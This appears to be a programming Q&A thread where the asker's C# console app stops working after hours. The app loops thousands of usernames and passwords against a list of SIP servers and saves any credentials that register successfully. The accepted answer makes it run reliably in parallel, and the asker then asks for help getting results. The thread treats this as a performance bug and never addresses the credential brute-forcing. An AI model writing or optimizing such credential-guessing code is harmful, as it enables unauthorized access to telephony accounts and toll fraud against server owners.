# How to fix c# application stop after X times of work

Tags: c#, garbage-collection

I'm create console app with c#, it reads some files and make for loop on it and in each one i'm calling a method, after some hours application stopped working or internet connection on server stopped working :

```
namespace Sample
{
    class Program
    {
        public static void Main(string[] args)
        {

            string contents = File.ReadAllText(@"threads.txt");

            if(contents != null) {
                ThreadPool.SetMaxThreads(Convert.ToInt32(contents), Convert.ToInt32(contents));
            }


            foreach (string user in File.ReadLines("x.txt"))
            {


                foreach (string pass in File.ReadLines("y.txt"))
                {

                    foreach (string line in File.ReadLines("z.txt"))
                    {

                        ThreadPool.QueueUserWorkItem(tesTConn, new object[] { a, b, c, d });
                        Thread.Sleep(50);
                    }
                    ///////////////////////////////////////////////////////////////////
                }
            }
            Console.WriteLine("Press ENTER to exit.");
            Console.Read();


        }

        //string domain, int port, string username, string password

          public static void tesTConn(object state)
    {
        try
        {

            object[] array = state as object[];
            string domain = Convert.ToString(array[0]);
            int port = Convert.ToInt32(array[1]);
            string username = Convert.ToString(array[2]);
            string password = Convert.ToString(array[3]);

            Console.WriteLine("Working with IP:" + domain + " | User :" + username + " | Pass:" + password);

            //  SipClient client = new SipClient(domain, port, username, password);
            SipClient client = new SipClient(domain, port, "0", "0");

            client.Connect();
            // Contact[] contacts = client.GetRegisteredContacts("sip:" + domain, "sip:" + username + "@" + domain);
            Contact[] contacts = client.GetRegisteredContacts("sip:" + domain, "sip:0@" + domain);

            if (!(contacts != null && contacts.Length > 0))
            {

                SipClient client1 = new SipClient(domain, port, username, password);
                client1.Connect();
                Contact[] contacts1 = client1.GetRegisteredContacts("sip:" + domain, "sip:" + username + "@" + domain);

                if ( contacts1.Length > 0)
                {
                    string path = @domain + ".txt";
                    if (!File.Exists(path))
                    {
                        using (var tw = new StreamWriter(path, true))
                        {
                            tw.WriteLine(domain);
                            tw.WriteLine(domain + " : " + username + " : " + password);
                        }

                    }
                    else if (File.Exists(path))
                    {
                        using (var tw = new StreamWriter(path, true))
                        {
                            tw.WriteLine(domain + " : " + username + " : " + password);
                        }
                    }
                }
                client1.Disconnect();

            }
            client.Disconnect();
            return;
        }
        catch { }
        finally { }
    }
    }
}
```

I'd like to know how to solve this issue by using Garbage collection or any other technique?

Comment: Here be dragons. You are possibly queuing an awful lot of work, which, by the way, you conveniently did not post. Might it be that you are forgetting to dispose things in the part that says `// here my code that's send request to other server and get the response;`? What kind of amount of lines can we expect anyway in those files? And what value is typically in `contents`?

Comment: I'm asking about the idea, code in this function work fine with me , I'll update the post with function code

Comment: Well, obviously the code is not optimal otherwise it won't stop working would it? The loops are fine.

Comment: the function code added to the post >>

Comment: How many strings in x.txt, y.txt and z.txt?

Comment: x = 5000 , y = 300 , z = 100

Answer (score 0, accepted):

Not sure if this is your problem, but you shouldn't set the thread pool threads like that, or enqueue enough work to max out the thread pool.  Instead set a MaxDegreeOfParallelism and let the CLR manage the thread pool.  EG

```
public static void Main(string[] args)
{

    int threads = Convert.ToInt32(File.ReadAllText(@"threads.txt"));

    var workItems = new List<object>();

    foreach (string user in File.ReadLines("x.txt"))
    {
        foreach (string pass in File.ReadLines("y.txt"))
        {
            foreach (string line in File.ReadLines("z.txt"))
            {
                workItems.Add(new object[] { user, pass, line });
            }
        }
    }
    var opts = new ParallelOptions() { MaxDegreeOfParallelism = threads };
    var results = Parallel.ForEach(workItems, opts, DoWork);

    Console.WriteLine("Press ENTER to exit.");
    Console.Read();


}

private static void DoWork(object state)
{
    //whatever 
}
```

Comment: Thank you the main problem was solved by your modification, but there is another issue appear that there are no results, so i think i need to give each item enough time, i'm try thread.sleap but it stop the code any advice about this issue!!